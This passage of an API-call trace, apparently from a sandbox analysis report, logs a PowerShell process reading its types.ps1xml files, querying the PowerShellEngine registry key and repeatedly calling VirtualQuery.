hFile=0x330, lpBuffer=0x2f4a2e3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2f4a2e3*, lpNumberOfBytesRead=0x24d4c8*=0x0, lpOverlapped=0x0) returned 1 [0061.325] ReadFile (in: hFile=0x330, lpBuffer=0x2f4ae88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ae88*, lpNumberOfBytesRead=0x24d4c8*=0x0, lpOverlapped=0x0) returned 1 [0061.327] CloseHandle (hObject=0x330) returned 1 [0061.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0061.339] SetErrorMode (uMode=0x1) returned 0x1 [0061.339] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d440 | out: lpFileInformation=0x24d440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0061.340] SetErrorMode (uMode=0x1) returned 0x1 [0061.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0061.342] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d528 | out: phkResult=0x24d528*=0x330) returned 0x0 [0061.342] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d4ac, lpData=0x0, lpcbData=0x24d4a8*=0x0 | out: lpType=0x24d4ac*=0x1, lpData=0x0, lpcbData=0x24d4a8*=0x56) returned 0x0 [0061.342] CoTaskMemAlloc (cb=0x5a) returned 0x1b9644d0 [0061.342] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d47c, lpData=0x1b9644d0, lpcbData=0x24d478*=0x56 | out: lpType=0x24d47c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d478*=0x56) returned 0x0 [0061.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0061.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0061.564] GetSystemInfo (in: lpSystemInfo=0x24c160 | out: lpSystemInfo=0x24c160*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0061.566] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0061.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0061.595] SetErrorMode (uMode=0x1) returned 0x1 [0061.595] SetErrorMode (uMode=0x1) returned 0x1 [0061.595] GetFileType (hFile=0x330) returned 0x1 [0061.595] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.597] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.601] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.602] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.602] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.603] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.603] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.603] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.603] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.604] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.604] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.604] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.605] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.605] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.605] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.605] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.605] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.607] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.607] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.607] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.607] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.607] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.608] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.608] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.608] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.608] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.609] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.609] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.609] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.609] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.610] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.610] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.610] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.613] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.613] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.613] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.613] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.613] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.614] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.615] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.615] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.615] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x1b4, lpOverlapped=0x0) returned 1 [0061.616] ReadFile (in: hFile=0x330, lpBuffer=0x2fb2048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2048*, lpNumberOfBytesRead=0x24d4c8*=0x0, lpOverlapped=0x0) returned 1 [0061.616] CloseHandle (hObject=0x330) returned 1 [0061.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0061.616] SetErrorMode (uMode=0x1) returned 0x1 [0061.616] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d440 | out: lpFileInformation=0x24d440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0061.616] SetErrorMode (uMode=0x1) returned 0x1 [0061.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0061.616] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d528 | out: phkResult=0x24d528*=0x330) returned 0x0 [0061.617] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d4ac, lpData=0x0, lpcbData=0x24d4a8*=0x0 | out: lpType=0x24d4ac*=0x1, lpData=0x0, lpcbData=0x24d4a8*=0x56) returned 0x0 [0061.617] CoTaskMemAlloc (cb=0x5a) returned 0x1b964000 [0061.617] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d47c, lpData=0x1b964000, lpcbData=0x24d478*=0x56 | out: lpType=0x24d47c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d478*=0x56) returned 0x0 [0061.617] CoTaskMemFree (pv=0x1b964000) [0061.617] RegCloseKey (hKey=0x330) returned 0x0 [0061.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0061.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0061.876] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0061.989] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0061.993] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0061.993] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0061.994] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0061.994] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0061.995] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.000] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.012] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.013] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.014] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.015] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.015] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.016] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.018] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.019] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.025] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.031] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.031] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.031] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.032] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.032] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.032] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.033] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.033] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 